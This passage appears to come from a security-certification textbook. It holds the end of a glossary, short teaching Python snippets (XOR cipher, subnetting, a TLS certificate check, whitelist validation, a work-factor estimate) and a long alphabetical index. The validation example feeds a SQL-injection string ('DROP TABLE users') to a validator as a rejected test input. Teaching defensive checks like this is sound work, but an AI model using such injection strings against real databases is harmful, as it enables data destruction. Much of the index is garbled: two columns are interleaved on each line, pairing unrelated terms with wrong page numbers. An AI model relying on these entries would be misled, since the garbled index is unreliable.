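        ks = keystream(seed, len(data))
        return bytes(b ^ k for b, k in zip(data, ks))

    plaintext = b"ATTACK AT DAWN"               # sample message, made up
    ciphertext = xor_stream(plaintext, seed=42)
    recovered = xor_stream(ciphertext, seed=42) # XOR with the same keystream decrypts
    print(ciphertext.hex(), recovered)

Because XOR is its own inverse, running the same function with the same keystream recovers the plaintext.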

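Similarly, the subnet and subnet mask entries can be demonstrated with Python's standard ipaddress module (the addresses shown are example values only):

    # Splitting an IP address into network and host portions using a subnet mask.
    import ipaddress

    network = ipaddress.ip_network("192.168.10.0/24")   # /24 = mask 255.255.255.0
    print(network.netmask)                              # network bits all 1s, host bits all 0s
    print(network.network_address)                      # 192.168.10.0
    print(network.broadcast_address)                    # 192.168.10.255

    host = ipaddress.ip_address("192.168.10.37")
    print(host in network)                              # True: the masked network portion matches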

virus - A type of malicious software program that, when executed, replicates itself by modifying other computer programs and inserting its own code.

VLAN - Virtual LAN. Any broadcast domain that is partitioned and isolated in a computer network at the data link layer (OSI layer 2).

VM - Virtual machine. An operating system (OS) or application environment that is installed on software which imitates dedicated hardware. The end user has the same experience on a virtual machine as they would have on dedicated hardware.

VoIP - Voice over IP. A category of hardware and software that enables people to use the Internet as the transmission medium for telephone calls by sending voice data in packets using IP, rather than by traditional circuit transmissions of the PSTN.

VPN - Virtual private network. A network that is constructed using public wires (usually the internet) to connect remote users or regional offices to an organization's private, internal network.

vulnerability - Any weakness an asset has against potential threats. Vulnerabilities can be hardware, software, or human/organizational; likewise, they can represent errors or shortcomings in system design, or known tradeoffs for desired features.

WAF - Web application firewall. An application firewall for HTTP applications that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as XSS and SQL injection.

WAP - Wireless access point.

web application - A client-server software application in which the client (or user interface) runs in a web browser. Common web applications include webmail, online retail sales, online auctions, wikis, instant messaging services, and many others.

web of trust - A cryptography framework in which a certificate is signed by one or more third parties to form a decentralized network of trust relationships: if you trust any of the people who have signed the certificate, then you should be able to trust its owner.

WEP - Wired Equivalent Privacy.

whitelist - A list of items (e.g., email addresses or domain names) that are granted access to a certain system or protocol. When a whitelist is used, all entities are denied access except those included in the list.

work factor - In cryptography, the amount of effort required to break a cryptosystem.

worm - A type of malware that replicates itself in order to spread to other computers. Often, it uses a computer network to spread, relying on security failures on the target computer to access it.

WPA - Wi-Fi Protected Access.

WPS - Wi-Fi Protected Setup.

X.509 - In cryptography, a standard that defines the format of public key certificates. X.509 certificates are used in many Internet protocols, including TLS/SSL, which is the basis for HTTPS, the secure protocol for browsing the web.

XML - eXtensible Markup Language. A tagged markup language designed to be both human- and machine-readable. It is related to HTML but more general-purpose, and is used for all sorts of documents, databases, and other web application data storage.

zero-day vulnerabilities - Weaknesses that even programmers and security vendors don't know about and haven't countered, and which attackers might learn about first.
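As a small illustration of the SSL/TLS and X.509 entries above, Python's standard ssl module can complete a TLS handshake and display the server's certificate (a sketch only: example.com is a placeholder host, and the code needs outbound network access):

    # Open a TLS connection and inspect the server's X.509 certificate.
    import socket
    import ssl

    hostname = "example.com"                    # placeholder host for illustration
    context = ssl.create_default_context()      # validates the certificate chain by default

    with socket.create_connection((hostname, 443)) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            cert = tls.getpeercert()            # parsed X.509 fields as a dictionary
            print(tls.version())                # e.g., TLSv1.2 or TLSv1.3
            print(cert["subject"], cert["notAfter"])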

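The validation and whitelist entries describe accepting only known-good input and denying everything else. A minimal sketch, assuming a hypothetical login form with an invented username pattern and domain whitelist:

    # Whitelist-style input validation: reject anything not explicitly allowed.
    import re

    ALLOWED_DOMAINS = {"example.com", "corp.example.com"}       # hypothetical whitelist
    USERNAME_PATTERN = re.compile(r"[A-Za-z0-9_.-]{1,32}")      # only these characters, 1-32 long

    def validate_login(username, email_domain):
        if not USERNAME_PATTERN.fullmatch(username):
            return False                        # fails the known-good character pattern
        if email_domain not in ALLOWED_DOMAINS:
            return False                        # implicit deny: not on the whitelist
        return True

    print(validate_login("alice_01", "example.com"))                    # True
    print(validate_login("alice'; DROP TABLE users;--", "evil.test"))   # False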


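Finally, the work factor entry can be made concrete with a rough brute-force estimate (illustrative arithmetic only; the attacker's guessing rate is an assumed figure):

    # Rough work-factor estimate: exhaustive search of an n-bit key space.
    key_bits = 128
    keyspace = 2 ** key_bits                    # number of possible keys
    guesses_per_second = 10 ** 12               # assumed attacker speed: one trillion keys/sec
    seconds = keyspace / guesses_per_second
    years = seconds / (60 * 60 * 24 * 365)
    print(f"Full search: about {years:.3e} years; average case (half the space): {years / 2:.3e} years")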
Alphabetical Index
Access control: 215, 404, 405, 406, 407, 408, 409, 410, 411, 412
    ACL: 405, 406, 409, 410, 411, 412
    Attribute-based: 409
    Discretionary: 405, 406, 410, 411, 412
    Implicit deny: 215
    Inherited permissions: 410
    Mandatory: 407
    Models: 404
    Role-based: 408
    Rule-based: 409
Access Control: 214, 216, 217
    Network ACLs: 214, 216
    Switches: 217
ACL (Access control list): 214, 215, 216
    Networks: 214, 216
    Rules: 215
ACL (Access Control Lists): 293, 295, 405, 406, 409, 410, 411, 412
    File permissions: 293, 295, 405, 406, 410, 411, 412
    Network: 409
Addresses: 167
    MAC table: 167
Addressing: 74, 166, 182, 183, 184, 185, 186, 188, 189, 190, 191, 192, 207
    Assignment: 189
    Classful vs. classless: 183
    DHCP: 189
    Domain names: 188
    IPv4: 182
    IPv6: 185
    MAC: 166
    Multicast: 186
    NAT: 190, 191
    PAT: 192
    Resolution: 188, 207
    Spoofing attacks: 74
    Subnet mask: 183
Addressing: 186, 187
    Domain names: 187
    IPv6: 186
    MAC address: 187
    Resolution: 187
    Scope: 186
Application attacks: 94, 95, 96, 101, 102, 104, 107, 108, 109, 344, 345, 346, 350, 351
    Arbitrary code execution: 95, 96
    Buffer overflow: 96
    Client-side: 107, 108, 109
    Command injection: 104
    Cross-site Request Forgery (XSRF): 109, 346
    Cross-site scripting (XSS): 108, 109, 344, 345, 346
    Directory traversal: 95
    DoS (Denial-of-service): 95, 96
    Fuzzing: 350
    Hardening: 351
    Header manipulation: 95
    Injection: 95
    Integer overflow: 96
    LDAP injection: 104
    NoSQL injection: 104
    Privilege escalation: 95
    Race conditions: 96
    SQL injection: 101, 102, 344, 345
    XML injection: 104
Application security: 298, 330, 338, 340, 341, 342, 343, 344, 345, 346, 349, 350, 351
    Code review: 349
    DevOps: 340
    Exception handling: 343
    Fuzzing: 350
    Hardening: 351
    Input sanitization: 343, 344, 345
    Input validation: 343, 344, 345
    Mobile devices: 330
    Provisioning: 350
    Secure coding principles: 343, 344, 345
    Software assurance: 338
    Software development: 338, 341, 342
    Transparent database encryption (TDE): 298
    XSRF prevention: 346
    XSS prevention: 346
Applications: 312, 356
    Blacklisting: 312
    Hardening: 312
    Virtual: 356
    Whitelisting: 312
Assessments: 22, 23, 24, 25, 26, 27, 28, 29, 31, 33, 35, 36, 37, 39, 40, 41, 277, 476, 477
    Business impact: 476, 477
    Impact analysis: 25
    Penetration test: 36, 39, 40, 41
    Privacy impact: 26
    Risk: 22, 23, 24, 25, 26, 27, 28, 29, 31, 33
    Supply Chain: 26
    Threat: 24
    Vulnerability: 35
    Vulnerability scan: 36, 37
    Vulnerability scanning: 277
Assets: 8, 449
    Management: 449
Attacks: 48, 49, 50, 52, 53, 54, 56, 57, 58, 63, 64, 66, 67, 72, 73, 74, 75, 79, 80, 81, 83, 84, 87, 88, 91, 94, 95, 96, 101, 102, 104, 107, 108, 109, 169, 187, 195, 196, 344, 345, 346, 350
    Application: 94, 95, 96, 101, 102, 104, 107, 108, 109, 344, 345, 346
    Arbitrary code execution: 95, 96
    ARP poisoning: 187
    ARP Poisoning: 75
    Attackers: 48, 49, 50
    Backdoor: 64
    Banner grabbing: 73
    Buffer overflow: 81
    Cross-site Request Forgery (XSRF): 346
    Cross-site scripting (XSS): 108, 109, 344, 346


DNS poisoning......................................................75 OAuth.................................................................396


DoS (Denial-of-service)......................79, 81, 95, 96 One-time password.............................................373
Eavesdropping......................................................87 One-time-passwords...........................................376
Flood.....................................................................81 OpenID...............................................................396
Forced access..................................................83, 84 PAP.....................................................................384
Fuzzing.........................................................73, 350 PIV......................................................................375
Inside.....................................................................52 RADIUS.............................................................385
IP spoofing............................................................74 RAS.....................................................................387
Logic bomb...........................................................64 SAML.................................................................395
MAC spoofing......................................................74 Server..................................................................382
Malware..............................................63, 64, 66, 67 Single Sign-on....................................................378
Man-in-the-middle................................................87 Smart card...........................................................375
Network................................................................72 Software token....................................................374
Overflow...............................................................96 TACACS+...........................................................387
Passwords.............................................................84 Transitive............................................................379
Pharming...............................................................75 Two-factor...........................................................372
Privilege escalation...............................................95 Wi-Fi...................................................................245
Probes...................................................................72 {Posture assessment............................................223
Replay...................................................................88 Authorization. . .404, 405, 406, 407, 408, 409, 410, 411,
Session hijacking..................................................88 412, 418, 419, 420, 421, 424, 426, 427, 428
Smurf....................................................................80 Access control models........................................404
Sniffing.................................................................87 Active Directory.........................418, 419, 420, 421
Social engineering..................52, 53, 54, 56, 57, 58 Attribute-based access control............................409
Spoofing................................................................74 DAC (Discretionary access control).405, 406, 410,
SQL injection......................................101, 102, 344 411, 412
Supply chain.........................................................66 Group policies.............................424, 426, 427, 428
SYN flood...........................................................195 MAC (Mandatory access control)......................407
Transitive access...................................................84 NTFS permissions.......................406, 410, 411, 412
Trojan horse..........................................................64 Permission propagation......................................412
UDP flood...........................................................196 Role-based access control...................................408
VLAN hopping.............................................75, 169 Rule-based access control).................................409
Watering hole........................................................64 Time of day restrictions......................................409
Wireless................................................................91 Availability.........................................................9, 15, 16
Xmas.....................................................................73 Controls.................................................................15
Zero-day................................................................72 Fault tolerance......................................................16
Authentication..137, 144, 146, 148, 149, 223, 245, 327, Redundancy..........................................................16
328, 330, 370, 371, 372, 373, 374, 375, 376, 377, 378, Single points of failure..........................................15
379, 382, 384, 385, 387, 392, 393, 395, 396 Backups..............................................485, 486, 487, 488
802.1X................................................................387 Folders................................................................488
Biometrics...........................................................377 Plans....................................................................486
CAC....................................................................375 Policies................................................................488
Certificates..................................144, 146, 148, 149 Securing..............................................................487
CHAP..................................................................384 Types...................................................................485
Credentials..........................................................373 Botnets.........................................................................64
Digital certificate................................................373 Broadcast....................................................................184
Digital signatures................................................137 Business agreements..........................................451, 453
EAP.....................................................245, 384, 387 BPA.....................................................................451
Factors.................................................................371 ISA......................................................................451
Federations..........................................................379 MOU...................................................................451
Guest network.....................................................223 SLA.....................................................................451
Hardware token...................................................374 Third parties........................................................453
HMAC................................................................137 Business continuity............476, 477, 478, 479, 481, 483
Kerberos......................................................392, 393 Alternate sites.....................................................483
LDAP..................................................................395 BCP.....................................................................477
MIC.....................................................................137 BIA.....................................................................477
Mobile credential management...........................330 DRP.....................................................................478
Mobile devices............................................327, 328 Plans....................................................................476
Multifactor..........................................................372 RPO.....................................................................481
Mutual.................................................................370 RTO.....................................................................481


Testing.................................................................479 RSA.....................................................................132
Certificates. 144, 146, 148, 149, 150, 151, 152, 237, 238 SHA....................................................................138
Authorities..........................................................148 TKIP...................................................................244
CSL.....................................................................150 TOTP..................................................................376
CSR.....................................................................149 Twofish...............................................................128
Encodings...........................................................148 WEP....................................................................244
Formats...............................................................146 WPA............................................................244, 245
Generation...........................................................149 Cryptography......12, 116, 117, 118, 120, 121, 122, 123,
Key storage.........................................................152 124, 125, 126, 127, 131, 132, 135, 136, 137, 144, 146,
OCSP..................................................................150 148, 152, 236, 237, 309
Pinning................................................................151 Alice and Bob.......................................................12
Revocation..................................................150, 151 Cipher suites.......................................................237
SSL.............................................................237, 238 Classical......................................................117, 118
Trust models.......................................................144 Code signing.......................................................309
Types...................................................................150 Confusion and diffusion.....................................121
Certificates PGP.........................................................240 Digital certificates...............................144, 146, 148
SSL.....................................................................240 Digital signatures................................................137
Classful vs. classless..................................................183 Encryption...........................................................116
Cloud services....................................361, 362, 363, 364 Hashing...............................................135, 136, 137
Cloud system..............................................................292 Key archival........................................................152
Big data...............................................................292 Key escrow.................................................123, 152
Command-line tools...203, 204, 205, 206, 207, 208, 209 Key exchange......................................................131
Ipconfig...............................................................204 Key generation............................................122, 136
Confidentiality.........................................................9, 14 Modes of operation.............................................127
Controls.................................................................14 Modules..............................................................124
Controls......13, 14, 15, 16, 17, 18, 19, 20, 32, 461, 462, Network protocols..............................................236
464, 466, 468, 469, 471 Nonce..................................................................127
Alerts.....................................................................20 One-time pad.......................................................117
Automation...........................................................32 Perfect forward secrecy......................................131
Availability............................................................15 Private key..........................................................125
Compensating.......................................................16 Public vs. private key..................................120, 132
Confidentiality......................................................14 Semantic security................................................126
Defense in depth...................................................17 Steganography....................................................118
Detective.............................................................464 Strength.......................................................121, 122
Environmental.....................................................469 Types...................................................................120
Incident detection............................................19, 20 Work factor.........................................................116
Integrity.................................................................15 Cryptography Elliptic curve Quantum.......................132
Obscurity...............................................................18 Data. .288, 289, 290, 291, 292, 293, 295, 297, 298, 299,
Physical...............................................461, 464, 466 300, 301, 305
Preventive...........................................................466 Big data...............................................................292
Safety..................................................462, 468, 471 Classification......................................................288
Security by design.................................................18 Custodian............................................................290
Types.....................................................................13 Data Loss Prevention (DLP)...............................292
Cryptographic standards....128, 132, 138, 244, 245, 376 File permissions..................................293, 295, 297
3DES...................................................................128 Hardware encryption..........................................299
AES.....................................................................128 Life cycle............................................................291
Bcrypt.................................................................138 Ownership...........................................................290
Blowfish..............................................................128 PHI......................................................................289
CCMP.................................................................244 PII.......................................................................289
DES.....................................................................128 Secure disposal...................................................305
Diffie-Hellman....................................................132 States...................................................................291
DSA....................................................................132 Steward...............................................................290
ECC.....................................................................132 Storage encryption..............................................298
HOTP..................................................................376 Windows encryption...........................299, 300, 301
MD5....................................................................138 Data security..............................................261, 329, 458
NTLM.................................................................138 Mobile devices....................................................329
PBKDF2.............................................................138 Networks.............................................................261
RC4.....................................................................128 Training...............................................................458
RIPEMD.............................................................138 Digital signatures.......................................................137


Disaster recovery: 478, 479, 481, 482, 483, 484, 485, 487, 488
    Alternate sites: 483
    Backups: 485, 487, 488
    DRP: 478
    Fault tolerance: 482, 484
    RPO: 481
    RTO: 481
    Spares: 483
    Testing: 479
Documentation: 23, 33, 440, 442, 443, 445
    Assessments: 33
    Policies: 440, 442, 445
    Risk registers: 23
    Secure configuration guides: 443
Email
    Phishing: 54
    Spam: 57
Encryption: 116, 117, 118, 120, 121, 122, 123, 125, 127, 128, 131, 132, 237, 244, 298, 299, 300, 301, 329
    Asymmetric: 120, 132
    Asymmetric algorithms: 132
    BitLocker: 299, 301
    Block and stream ciphers: 125
    Cipher suites: 237
    Ciphers: 116
    Classical: 117, 118
    Confusion and diffusion: 121
    Drive: 298
    EFS: 299, 300, 301
    Ephemeral and static keys: 131
    HSM (Hardware security module): 299
    Initialization vector: 127
    Key exchange: 123, 131
    Keys: 116, 122
    Mobile devices: 329
    Mode of operation: 127
    One-time pad: 117
    Plaintext: 116
    ROT13: 117
    Session keys: 131
    Steganography: 118
    Storage: 298
    Symmetric: 120, 125
    Symmetric algorithms: 128
    TPM (Trusted platform module): 299
    Transport: 120
    Types: 120
    Weaknesses: 122
    Wireless: 244
    XOR functions: 122
    Full drive encryption: 299
False positives and negatives: 20
Fault tolerance: 230, 231, 482, 484
    Backup power: 482
    Clustering: 482
    Load balancing: 230, 231, 482
    RAID: 484
Firewalls: 218, 219, 220, 223, 230
    DMZ: 220
    Interfaces: 223
    Topology: 220
    Types: 219
    Web application firewall: 230
Hardening: 349, 350, 351
    Application: 349, 350, 351
Hardware: 304
    Secure destruction: 304
Hashing: 135, 136, 138
    Algorithms: 138
    Applications: 136
Header: 254, 255
    AH: 255
    ESP: 254
Host security: 262, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 322, 332, 432, 433
    Antimalware: 313
    Applications: 312
    Baselines: 308
    Code signing: 309
    Embedded devices: 320
    Firewalls: 313
    Firmware: 310
    Legacy systems: 320
    Mainframes: 320
    Mobile operating systems: 332
    Operating system hardening: 311
    Peripherals: 312
    Physical: 314
    Removing malware: 315, 316, 317
    SCADA: 320
    Security templates: 432, 433
    Software updates: 318, 319
    Static devices: 322
    Trusted hardware: 310
IEEE standards: 387
    802.1X: 387
Implicit deny: 215
Incident response: 19, 20, 278, 279, 493, 494, 495, 496, 497, 498, 499, 500
    Containment: 498
    Eradication: 499
    Evaluation: 20
    Events vs. incidents: 19
    Followup: 500
    Forensics: 493, 494
    Identification: 497
    Investigation: 498
    Preparation: 496
    Process: 496
    Remediation: 279
    Reports: 278
    Restoring service: 499
    Teams: 495
Industrial control systems: 179
Integrity: 9, 15, 135
    Controls: 15
    Hashing: 135
IP address: 186


Link-local............................................................186 Virtual.........................................................357, 359


Loopback............................................................186 VPN concentrator...............................................249
Multicast.............................................................186 Web security gateway.........................................230
IP addresses................182, 183, 184, 185, 186, 187, 188 Wireless access points........................................174
Resolution...................................................187, 188 Network convergence................................................179
IPv4....................................................................182, 184 Industrial control systems...................................179
IPv6....................................................................184, 185 Network devices.................................................170, 262
Least privilege..............................................................14 Hardening...........................................................262
Malware.............................63, 65, 66, 67, 315, 316, 317 Routers................................................................170
Adware..................................................................65 Network models.........................................................179
Armored................................................................66 Network ports.............................................192, 197, 198
Defenses................................................................67 Address translation.............................................192
Polymorphic..........................................................66 Common assignments.........................................198
Ransomware.........................................................65 Ranges.................................................................197
Removal..............................................315, 316, 317 Network segmentation...............................................260
Rootkit..................................................................66 Network shares...........................................................297
Spyware................................................................65 File permissions..................................................297
Vectors..................................................................63 Networks....35, 72, 74, 75, 79, 81, 83, 87, 91, 162, 163,
Viruses vs. trojans.................................................63 164, 166, 167, 168, 170, 172, 173, 174, 176, 177, 178,
Mobile devices. 324, 325, 326, 327, 328, 329, 330, 331, 180, 182, 194, 197, 198, 200, 201, 202, 214, 216, 218,
332 219, 220, 222, 223, 227, 228, 229, 230, 233, 236, 237,
Application security............................................330 238, 239, 240, 244, 245, 248, 249, 250, 251, 252, 253,
Authentication.............................................327, 328 254, 259, 260, 261, 262, 264, 267, 272, 274, 276, 277,
BYOD.................................................................325 278, 279, 322, 331, 361, 362, 363, 364, 382, 385, 387,
Data protection....................................................329 392, 393, 395, 396, 468
Encryption...........................................................329 ACL (Access control list)...........................214, 216
Geotagging..........................................................330 Application layer................................................200
Hardening...........................................................332 Assessments........................................................277
MDM..................................................................327 Attack types..........................................................72
Networks.............................................................331 Attacks..................................................................87
Policies................................................325, 326, 327 Auditing..............................................................278
Risks...................................................................324 Authentication.............................385, 387, 395, 396
Screen locks................................................327, 328 Broadcast domain...............................................167
Tracking..............................................................329 Cloud services.............................361, 362, 363, 364
Updating.............................................................332 Collision domain.................................................167
Monitoring. 206, 267, 268, 269, 270, 271, 272, 274, 278 Content filters.....................................................230
Logging.......................................................271, 272 Convergence.......................................................177
Netstat.................................................................206 Cryptography......................................................236
Security audits....................................................278 Data Link layer...................................................166
SNMP.........................................................269, 270 Denial-of-service attacks................................79, 81
Tools...........................................267, 268, 272, 274 Domain.......................................................392, 393
Network components 167, 174, 176, 180, 218, 219, 220, Eavesdropping attacks..........................................87
223, 227, 228, 229, 230, 231, 232, 233, 239, 249, 357, Email...................................................................202
358, 359, 382 Email security.....................................................240
Antennas.............................................................176 Firewalls.............................................218, 219, 220
Authentication server..........................................382 Forced access attacks............................................83
Content filter.......................................................230 Hardening...................................................262, 264
Firewall.......................................218, 219, 220, 223 Honeypots...........................................................229
Honeypot.............................................................229 ICMP...................................................................173
IDS/IPS.......................................................227, 228 IDS/IPS.......................................................227, 228
Load balancer..............................................230, 231 IP addresses.........................................................182
Proxy server........................................................232 IP packets............................................................172
SDN....................................................................358 Layers.........................................................163, 164
Spam filter..........................................................230 MAC addresses...................................................166
SSL Decryptor....................................................239 Management interfaces.......................................223
SSL/TSL Acclerator............................................239 Mobile connections.............................................331
Storage................................................................180 Monitoring..................................................267, 274
Switches..............................................................167 Network Access Control.....................................222
UTM (Unified threat management)....................233 Network layer.....................................................170


OSI model...................................................163, 236 Physical security 58, 312, 314, 461, 462, 463, 464, 465,
Ports............................................................197, 198 466, 467, 468, 469, 470, 471, 472
PPP......................................................................382 Access lists..........................................................467
Probe attacks.........................................................72 Alarms.................................................................465
Protected Distribution Systems...........................468 Barricades...........................................................463
Redirection attacks................................................75 Biometrics...........................................................467
Reference models................................................162 Cameras..............................................................464
Remote access.............................................200, 239 Controls...............................................................461
Resource sharing protocols.................................201 EMI shielding.....................................................470
SAN....................................................................180 Environmental controls.......................................468
Securing data......................................................261 Facilities..............................................................462
Security posture..................................................276 Fences.................................................................463
Segmentation..............................................259, 260 Fire suppression..................................................471
Session Layer......................................................197 Guards.........................................................465, 467
SIEM...................................................................272 Hardware locks...................................................468
Spoofing attacks....................................................74 Hosts...................................................................314
SSL and TLS.......................................237, 238, 239 HVAC.................................................................469
Static device security..........................................322 ID Badges...........................................................467
Switches..............................................................167 Lighting...............................................................464
TCP.....................................................................194 Locks...................................................................466
TCP/IP model.....................................................164 Mantraps.............................................................467
Transport layer....................................................194 Motion detectors.................................................465
Transport Layer...................................................194 Peripherals..........................................................312
Troubleshooting..................................................279 Protected Distribution Systems...........................468
UTM (Unified threat management)....................233 Proximity scanners..............................................467
VLANs................................................................168 Safety..................................................................472
VoIP............................................................178, 240 Signs...................................................................464
VPNs (Virtual private networks)......248, 249, 250, Social engineering................................................58
251, 252, 253, 254 PKI (Public key infrastructure)..................................144
Vulnerability assessments.....................................35 Policies.14, 59, 148, 276, 278, 279, 288, 289, 290, 291,
Wireless......................................................174, 176 292, 305, 308, 318, 319, 320, 325, 326, 327, 351, 427,
Wireless attacks....................................................91 428, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449,
Wireless security.........................................244, 245 450, 451, 454, 457, 458, 459, 472, 493, 494, 495, 496,
Zero-day vulnerabilities........................................72 497, 498, 499, 500
Networks (Industrial control systems).......................179 Acceptable use....................................................444
SCADA...............................................................179 Acceptable Use...........................................446, 454
Networks Port security...............................................217 Adverse actions...................................................454
Switches..............................................................217 Asset management..............................................449
Non-repudiation.........................................................137 Audits..................................................................278
Operating systems..............................................310, 311 Business agreements...........................................451
Hardening............................................................311 Certificate Practice Statement.............................148
Trusted................................................................310 Change management...................318, 319, 320, 450
Organizations...............................................................10 Clean desk...........................................................448
Standards bodies...................................................10 Data classification...............................................288
Passwords.....................................84, 136, 373, 376, 447 Data disposal.......................................................305
Cracking................................................................84 Data handling......................................................458
Key stretching.....................................................136 Data life cycle.....................................................291
One-time.....................................................373, 376 Data loss prevention...........................................292
Policies................................................................447 Data ownership...................................................290
Storage................................................................136 Document design................................................445
Penetration tests.........................................36, 39, 40, 41 Documentation....................................................440
Black vs. White box..............................................40 Frameworks........................................................442
Goals and results...................................................39 Human resource..................................................448
Process..................................................................40 Incident response......445, 493, 494, 495, 496, 497,
Reconnaissance.....................................................41 498, 499, 500
Tools.....................................................................40 Least privilege..............................................14, 448
Personally identifiable information (PII).............26, 289 Mandatory vacations...........................................448
Personnel....................................................................495 Mobile devices....................................325, 326, 327
Incident response................................................495 Need to know........................................................14


    Password...........................................427, 428, 447
    PII............................................................289
    Privacy.....................................................446, 454
    Regulatory compliance..........................................441
    Remediation....................................................279
    Rotation of duties.............................................448
    Safety.........................................................472
    Secure configuration guides....................................443
    Security baseline..............................................351
    Security baselines.............................................308
    Security posture...............................................276
    Separation of duties.......................................14, 448
    Social engineering..............................................59
    Social media...................................................454
    Training............................................457, 458, 459
    User...........................................................457
Port numbers.......................................................194
Private............................................................184
Procedures.........................................................496
    Incident response..............................................496
Protocols.......150, 172, 173, 184, 187, 188, 189, 194, 195, 196, 200, 201, 202, 207, 208, 209, 237, 238, 239, 240, 251, 252, 253, 254, 269, 270, 271, 382, 384, 385, 387, 392, 393, 395, 396
    ARP........................................................187, 207
    DHCP...........................................................189
    Diameter.......................................................387
    DNS............................................................188
    EAP............................................................387
    FTP............................................................201
    FTPS...........................................................238
    GRE............................................................251
    HTTP...........................................................202
    HTTPS......................................................202, 238
    ICMP...........................................................173
    IMAP...........................................................202
    IPsec..............................................251, 252, 253, 254
    IPv4...........................................................172
    IPv6.......................................................172, 184
    Kerberos...................................................392, 393
    L2TP...........................................................251
    LDAP.......................................................201, 395
    MAPI...........................................................202
    NDP............................................................187
    NETBios........................................................201
    NTP............................................................201
    OAuth..........................................................396
    OCSP...........................................................150
    OpenID.........................................................396
    OpenPGP........................................................240
    Ping.......................................................208, 209
    POP............................................................202
    PPP........................................................382, 384
    PPTP...........................................................251
    RADIUS.........................................................385
    RDP............................................................200
    RTP............................................................240
    S/MIME.........................................................240
    SAML...........................................................395
    SCP............................................................239
    SFTP...........................................................239
    SIP............................................................240
    SMB............................................................201
    SMTP...........................................................202
    SNMP...............................................200, 238, 269, 270
    SSH....................................................200, 239, 251
    SSL............................................................237
    SSL/TLS........................................................251
    SYSLOG.........................................................271
    TACACS+........................................................387
    TCP........................................................194, 195
    Telnet.........................................................200
    TFTP...........................................................201
    TLS............................................................237
    UDP............................................................196
Regulatory compliance....................................16, 364, 441
    Cloud services.................................................364
    Compensating controls...........................................16
Risk...................10, 22, 23, 24, 25, 26, 27, 28, 29, 31, 453, 477
    Assessment......................................................22
    Assets..........................................................23
    Attacks.........................................................10
    BCP............................................................477
    Impact..........................................................25
    Management strategies...........................................31
    Mitigation strategies...........................................31
    Privacy.........................................................26
    Qualitative vs. quantitative................................28, 29
    Registers.......................................................23
    Supply chain....................................................26
    Third-party agreements.........................................453
    Threat probability..............................................27
    Threat vectors..................................................10
    Threats.........................................................24
    Vulnerabilities.................................................10
Routers.............................................170, 190, 191, 192
    NAT...................................................190, 191, 192
Safety.........................................468, 469, 470, 471, 472
    Environmental controls.....................................468, 470
    Fire suppression...............................................471
    HVAC...........................................................469
    Procedures.....................................................472
Scope..............................................................186
Security..............................................296, 297, 304
    Data disposal..................................................304
    Encrypting File System (EFS)...................................296
    Local share....................................................297
    Share permissions..............................................297
    System files...................................................296
Security concepts.......8, 9, 10, 12, 17, 18, 32, 360, 370, 371, 372, 373, 377, 378, 379, 382
    AAA........................................................370, 382
    Alice and Bob...................................................12
    Assets...........................................................8
    Authentication.................370, 371, 372, 373, 377, 378
    Automation......................................................32
    CIA triad........................................................9
    Defense in depth................................................17
    Non-persistence................................................360
    Open security...................................................18
    Risk............................................................10
    Security by design..............................................18
    Security through obscurity......................................18
    Standards organizations.........................................10
    Threats......................................................8, 10
    Transitive Trust...............................................379
    Vulnerabilities.................................................10
Security events.....................................................19
Security posture...................................................276
    Network........................................................276
Security principles...........................338, 340, 341, 343, 404
    Access control.................................................404
    Implicit deny..................................................404
    Secure coding.............................338, 340, 341, 343
Settings................................................204, 205, 254
    IP.........................................................204, 205
    IPsec..........................................................254
Smart cards........................................................299
    Encryption.....................................................299
Social engineering............................52, 53, 54, 56, 57, 58
    Defense techniques..............................................58
    Dumpster diving.................................................58
    Hoaxes..........................................................57
    Impersonation attacks...........................................54
    Phishing........................................................54
    Principles of operation.........................................53
    Shoulder surfing................................................58
    Spam............................................................57
    Spear phishing..................................................56
    Tailgating......................................................58
    Typosquatting...................................................56
    URL hijacking...................................................56
    Vishing.........................................................56
    Whaling.........................................................56
Software........................................................292, 313
    Data loss prevention (DLP).....................................292
    Security.......................................................313
Special............................................................184
Standards..............................................10, 144, 146, 148
    GPG............................................................146
    OpenPGP....................................................144, 146
    Organizations...................................................10
    X.509.................................................144, 146, 148
Steganography......................................................118
Storage............................................................304
    Secure destruction.............................................304
System files........................................................75
    Hosts...........................................................75
Threats...................................................8, 24, 25, 26, 27
    Assessments.....................................................24
    Impact..........................................................25
    Probability.....................................................27
    Supply Chain....................................................26
Tools...................203, 267, 268, 269, 270, 271, 272, 274, 277
    Command-line...................................................203
    Monitoring...................267, 268, 269, 270, 271, 272, 274
    Network analyzers..............................................268
    SIEM...........................................................272
    Vulnerability scanners.........................................277
Training....................................448, 457, 458, 459
    Continuing.....................................................459
    Data handling..................................................458
    Policies.......................................................448
    Role-based.....................................................457
Troubleshooting................203, 208, 209, 279, 315, 316, 317
    Malware....................................315, 316, 317
    Network....................................203, 208, 209
    Network security...............................................279
User accounts..........417, 418, 419, 420, 421, 424, 426, 427, 428, 432, 433
    Active Directory..........................418, 419, 420, 421
    Group Policies..................424, 426, 427, 428, 432, 433
    Types..........................................................417
User awareness..................................................58, 67
    Malware.........................................................67
    Social engineering..............................................58
Virtualization.........248, 249, 251, 252, 253, 254, 354, 356, 357, 358, 359, 360, 361, 362, 363, 364
    Applications...................................................356
    Cloud services............................361, 362, 363, 364
    Container......................................................354
    Hypervisor.....................................................354
    Network devices.............................357, 358, 359
    VDI........................................................358, 360
    VM (Virtual Machine)...........................................354
    VPN...........................248, 249, 251, 252, 253, 254
VPN.......................248, 249, 250, 251, 252, 253, 254
    Always-on......................................................251
    Components.....................................................249
    Concentrator...................................................249
    IPsec.......................................252, 253, 254
    Protocols......................................................251
    Topology.......................................................248
    Tunnel types...................................................250
Vulnerabilities................................................94, 108
    Add-ons........................................................108
    Applications...................................................108
    Browser........................................................108
    Cookies........................................................108
    Web applications................................................94
Vulnerability scans.............................................36, 37
    Goals and results...............................................37
    Types...........................................................37
Windows features.........................................299, 300, 301
    Encryption................................299, 300, 301
Wireless networks...............................................91, 264
    Attacks.........................................................91
    Hardening......................................................264
XOR functions......................................................122
